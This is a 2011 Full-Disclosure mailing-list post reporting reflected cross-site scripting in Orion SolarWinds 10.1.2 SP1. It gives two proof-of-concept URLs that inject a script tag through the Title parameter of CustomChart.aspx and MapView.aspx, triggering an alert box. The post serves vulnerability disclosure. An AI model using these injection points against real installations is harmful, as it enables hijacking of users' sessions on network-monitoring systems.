[Full-disclosure] Orion SolarWinds XSS attack
- From: Gustavo <gustavorobertux@xxxxxxxxx>
- Date: Mon, 12 Sep 2011 11:45:32 -0300
Software : Orion SolarWinds 10.1.2 - SP1
XSS
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
http://orion.xxx.xxx/Orion/NetPerfMon/CustomChart.aspx?ChartName=AvgRTLoss&NetObject=N:355&ResourceID=17&NetObjectPrefix=N&Rows=&Title=%3Cscript%3Ealert%28%27ALERTA%27%29%3C/script%3E
http://orion.xxx.xxx/Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813
f-231270=0225b7.OrionMap&Title=%3Cscript%3EALERTA%28%27test%27%29%3C/scri
pt%3E
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
Cya !
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Prev by Date: [Full-disclosure] [TEHTRI-Security] Facebook Security Issues through HTML Iframes
- Next by Date: [Full-disclosure] [SECURITY] [DSA 2308-1] mantis security update
- Previous by thread: [Full-disclosure] [TEHTRI-Security] Facebook Security Issues through HTML Iframes
- Next by thread: [Full-disclosure] [SECURITY] [DSA 2308-1] mantis security update
- Index(es):
Relevant Pages
|
